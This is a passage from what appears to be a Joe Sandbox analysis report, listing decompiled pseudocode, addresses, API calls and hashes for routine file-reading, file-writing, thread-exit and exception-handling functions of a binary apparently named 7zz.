				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t17;
			}








                                                                                                                                    0x00411199
                                                                                                                                    0x004111a5
                                                                                                                                    0x004111ab
                                                                                                                                    0x004111af
                                                                                                                                    0x004111b4
                                                                                                                                    0x004111b6
                                                                                                                                    0x004111bb
                                                                                                                                    0x004111c0
                                                                                                                                    0x004111c4
                                                                                                                                    0x004111ca
                                                                                                                                    0x004111d4
                                                                                                                                    0x004111d8
                                                                                                                                    0x004111dd
                                                                                                                                    0x004111e1
                                                                                                                                    0x004111e7
                                                                                                                                    0x004111f1
                                                                                                                                    0x004111f9
                                                                                                                                    0x004111f9
                                                                                                                                    0x00411201
                                                                                                                                    0x00411206
                                                                                                                                    0x004111b6
                                                                                                                                    0x0041120c
                                                                                                                                    0x00411214

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00411199
                                                                                                                                      • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                                                                      • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                                                                                    • Instruction ID: 608382dd46c2c598823991ebebde0f7aed9941af7d6df7122e602381931aeda8
                                                                                                                                    • Opcode Fuzzy Hash: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
                                                                                                                                    • Instruction Fuzzy Hash: 0E019E31E00258AACF15E7A9D4017EEB7B89F85358F14C0AFE411B32D2CB7C1A08C799
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C914 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E0040C914(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _t17;
				signed int _t18;
				void* _t28;
				void* _t30;

				L0046B890(0x473e64, _t30);
				_push(__ecx);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t17 = E0040C83C(_t30 - 0x10, __ecx,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), __edx,  *((intOrPtr*)(_t30 + 0x10)), 1); // executed
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				_t28 = _t17;
				_t18 =  *(_t30 - 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}







                                                                                                                                    0x0040c919
                                                                                                                                    0x0040c91e
                                                                                                                                    0x0040c91f
                                                                                                                                    0x0040c928
                                                                                                                                    0x0040c93b
                                                                                                                                    0x0040c940
                                                                                                                                    0x0040c944
                                                                                                                                    0x0040c946
                                                                                                                                    0x0040c94b
                                                                                                                                    0x0040c950
                                                                                                                                    0x0040c950
                                                                                                                                    0x0040c959
                                                                                                                                    0x0040c961

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040C919
                                                                                                                                      • Part of subcall function 0040C83C: __EH_prolog.LIBCMT ref: 0040C841
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                                                                                    • Instruction ID: 5a94585eceb8510585562d7b83d4e929578e69876529fb1f756434af7c7637c0
                                                                                                                                    • Opcode Fuzzy Hash: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
                                                                                                                                    • Instruction Fuzzy Hash: 9AF05E72A00219EFDB14EF98CC01BEEB779FB44355F10826AB425E7290C7789E00CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E00405C72(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;

				_t32 = __eflags;
				L0046B890(0x4734b8, _t27);
				_push(_t17);
				_push(_t24);
				 *0x490a80 = 0x490ab8;
				 *((intOrPtr*)(_t27 - 0x10)) = _t29 - 0x30;
				 *0x490a7c = E00405F22();
				E004018A2(_t27 - 0x14);
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *(_t27 - 4) = 1;
				_t14 = E00403A70(_t17, _t22, _t24, _t32, _t22); // executed
				_t25 = _t14;
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				E00401917(_t27 - 0x14); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t25;
			}














                                                                                                                                    0x00405c72
                                                                                                                                    0x00405c77
                                                                                                                                    0x00405c7f
                                                                                                                                    0x00405c80
                                                                                                                                    0x00405c82
                                                                                                                                    0x00405c8c
                                                                                                                                    0x00405c97
                                                                                                                                    0x00405c9c
                                                                                                                                    0x00405ca1
                                                                                                                                    0x00405ca5
                                                                                                                                    0x00405ca9
                                                                                                                                    0x00405cae
                                                                                                                                    0x00405f05
                                                                                                                                    0x00405f0c
                                                                                                                                    0x00405f18
                                                                                                                                    0x00405f21

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00405C77
                                                                                                                                      • Part of subcall function 00405F22: GetVersionExA.KERNEL32(?), ref: 00405F3C
                                                                                                                                      • Part of subcall function 004018A2: SetConsoleCtrlHandler.KERNEL32(004018DA,00000001,?,?,?,00405CA1), ref: 004018B6
                                                                                                                                      • Part of subcall function 00403A70: __EH_prolog.LIBCMT ref: 00403A75
                                                                                                                                      • Part of subcall function 00403A70: SetFileApisToOEM.KERNEL32 ref: 00403A83
                                                                                                                                      • Part of subcall function 00403A70: GetCommandLineW.KERNEL32 ref: 00403A9E
                                                                                                                                      • Part of subcall function 00401917: SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConsoleCtrlH_prologHandler$ApisCommandFileLineVersion
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3811785086-0
                                                                                                                                    • Opcode ID: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                                                                                    • Instruction ID: fcab1c6799a526d6cc84579c245541fcc004ed5d2a27ee256b075ce021a0ee51
                                                                                                                                    • Opcode Fuzzy Hash: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
                                                                                                                                    • Instruction Fuzzy Hash: 9FF0BE72D002459ECB04EBAA980269EBB74EB60368F10857FE412732D1D77C0B04CBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004177F2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E004177F2(void* __ecx) {
				intOrPtr _t9;
				signed int _t10;
				void* _t11;
				intOrPtr _t14;
				void* _t18;
				void* _t20;

				L0046B890(E00474CB6, _t20);
				_push(__ecx);
				_t18 = __ecx;
				_push(0x3c); // executed
				_t9 = L004079F2(); // executed
				_t14 = _t9;
				 *((intOrPtr*)(_t20 - 0x10)) = _t14;
				_t10 = 0;
				_t23 = _t14;
				 *(_t20 - 4) = 0;
				if(_t14 != 0) {
					_push( *((intOrPtr*)(_t20 + 8)));
					_t10 = L00417839(_t14, _t23);
				}
				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				_t11 = E00415C6D(_t18, _t10);
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return _t11;
			}









                                                                                                                                    0x004177f7
                                                                                                                                    0x004177fc
                                                                                                                                    0x004177fe
                                                                                                                                    0x00417800
                                                                                                                                    0x00417802
                                                                                                                                    0x00417808
                                                                                                                                    0x0041780a
                                                                                                                                    0x0041780d
                                                                                                                                    0x0041780f
                                                                                                                                    0x00417811
                                                                                                                                    0x00417814
                                                                                                                                    0x00417816
                                                                                                                                    0x00417819
                                                                                                                                    0x00417819
                                                                                                                                    0x0041781e
                                                                                                                                    0x00417825
                                                                                                                                    0x0041782e
                                                                                                                                    0x00417836

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004177F7
                                                                                                                                      • Part of subcall function 00417839: __EH_prolog.LIBCMT ref: 0041783E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: d4ccb3ab7acd448974731f8e502f1d648db0997da2de2fd10ab614c1084d381e
                                                                                                                                    • Instruction ID: c9210bf419dbfafd84c2b986a8351f20f899aa0a592e3bc0ca1226de28c8c466
                                                                                                                                    • Opcode Fuzzy Hash: d4ccb3ab7acd448974731f8e502f1d648db0997da2de2fd10ab614c1084d381e
                                                                                                                                    • Instruction Fuzzy Hash: C5E09271A04525AFDB09FF6C88066ED76A5AB48754F10823FE016E32C1EB784A40C699
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040BD9F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E0040BD9F(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x48b5b0; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                                                                                                                    0x0040bd9f
                                                                                                                                    0x0040bda2
                                                                                                                                    0x0040bda3
                                                                                                                                    0x0040bdab
                                                                                                                                    0x0040bdad
                                                                                                                                    0x0040bdad
                                                                                                                                    0x0040bdb6
                                                                                                                                    0x0040bdc2
                                                                                                                                    0x0040bdd0
                                                                                                                                    0x0040bdd6

                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040BDC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                                                                                    • Instruction ID: f5b03d0275e53328e8766596d7aa07537ccbbd1802995bf3e8a2da8ce39c38f6
                                                                                                                                    • Opcode Fuzzy Hash: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
                                                                                                                                    • Instruction Fuzzy Hash: 84E0C275600208FBCB01CF95C841B8E7BB9EB48354F20C069F919AA2A0D739AA50DF98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046CE2E Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E0046CE2E() {
				intOrPtr* _t5;
				void* _t14;
				intOrPtr _t15;

				_t15 =  *((intOrPtr*)(_t14 - 0x18));
				E0046E706( *((intOrPtr*)(_t14 - 0x20)));
				_t5 =  *0x4965a4; // 0x0
				if(_t5 != 0) {
					 *_t5();
				}
				_t13 = E0046E383();
				if(_t6 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t13);
				ExitThread( *(_t15 + 8));
			}






                                                                                                                                    0x0046ce2e
                                                                                                                                    0x0046ce34
                                                                                                                                    0x0046ce39
                                                                                                                                    0x0046ce40
                                                                                                                                    0x0046ce42
                                                                                                                                    0x0046ce42
                                                                                                                                    0x0046ce4a
                                                                                                                                    0x0046ce4e
                                                                                                                                    0x0046ce52
                                                                                                                                    0x0046ce57
                                                                                                                                    0x0046ce59
                                                                                                                                    0x0046ce63

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2158977761-0
                                                                                                                                    • Opcode ID: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                                                                                    • Instruction ID: 64bb69de8ff6d42c3457098edc656902f5609d49139222b7e3e69db672cf67b2
                                                                                                                                    • Opcode Fuzzy Hash: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
                                                                                                                                    • Instruction Fuzzy Hash: 4CE086319001115FDB2127A2DC0A66F3670AF00354F01002BF8405A260FB598C91469F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042F024 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E0042F024(intOrPtr* __ecx, void* __eflags) {
				void* _t10;
				void* _t19;
				intOrPtr _t21;

				L0046B890(0x4776a4, _t19);
				_push(__ecx);
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				_t10 = E0042EC5C(__ecx, __eflags,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t10;
			}






                                                                                                                                    0x0042f029
                                                                                                                                    0x0042f02e
                                                                                                                                    0x0042f032
                                                                                                                                    0x0042f036
                                                                                                                                    0x0042f042
                                                                                                                                    0x0042f057
                                                                                                                                    0x0042f060

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042F029
                                                                                                                                      • Part of subcall function 0042EC5C: __EH_prolog.LIBCMT ref: 0042EC61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                                                                                    • Instruction ID: f263eec74e2fdc413f8ce8191d7481965beeba368c6f144b2a49cdf0410d163b
                                                                                                                                    • Opcode Fuzzy Hash: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
                                                                                                                                    • Instruction Fuzzy Hash: 56E04632A00118FBCB01AF8AD801BEE7B38FB453A4F00842BF01556001C3BA99109AA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040BC58 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E0040BC58(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                                                                                                                    0x0040bc5b
                                                                                                                                    0x0040bc62
                                                                                                                                    0x0040bc6e
                                                                                                                                    0x0040bc7c
                                                                                                                                    0x0040bc82

                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(000000FF,?,?,?,00000000,000000FF,?,0040BCA3,?,?,00000000,?,0040BCC9,?,?,00000002), ref: 0040BC6E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                                                                                    • Instruction ID: e80a47eef93cbac88b9d1de4091ab22be8c7773048f98afb7b75ce3e7b1ffdc8
                                                                                                                                    • Opcode Fuzzy Hash: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
                                                                                                                                    • Instruction Fuzzy Hash: DEE0EC75200208FBDB01CF90CC01F8E7BB9FB49754F208058E90596160C375AA64EB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046CE39 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E0046CE39(long _a4) {
				intOrPtr* _t2;

				_t2 =  *0x4965a4; // 0x0
				if(_t2 != 0) {
					 *_t2();
				}
				_t10 = E0046E383();
				if(_t3 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t10);
				ExitThread(_a4);
			}




                                                                                                                                    0x0046ce39
                                                                                                                                    0x0046ce40
                                                                                                                                    0x0046ce42
                                                                                                                                    0x0046ce42
                                                                                                                                    0x0046ce4a
                                                                                                                                    0x0046ce4e
                                                                                                                                    0x0046ce52
                                                                                                                                    0x0046ce57
                                                                                                                                    0x0046ce59
                                                                                                                                    0x0046ce63

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2158977761-0
                                                                                                                                    • Opcode ID: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
                                                                                                                                    • Instruction ID: a94cd4d5187b38e27ba911a5e394843a57b7ffb4073ce8cb43cd479127d45c81
                                                                                                                                    • Opcode Fuzzy Hash: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
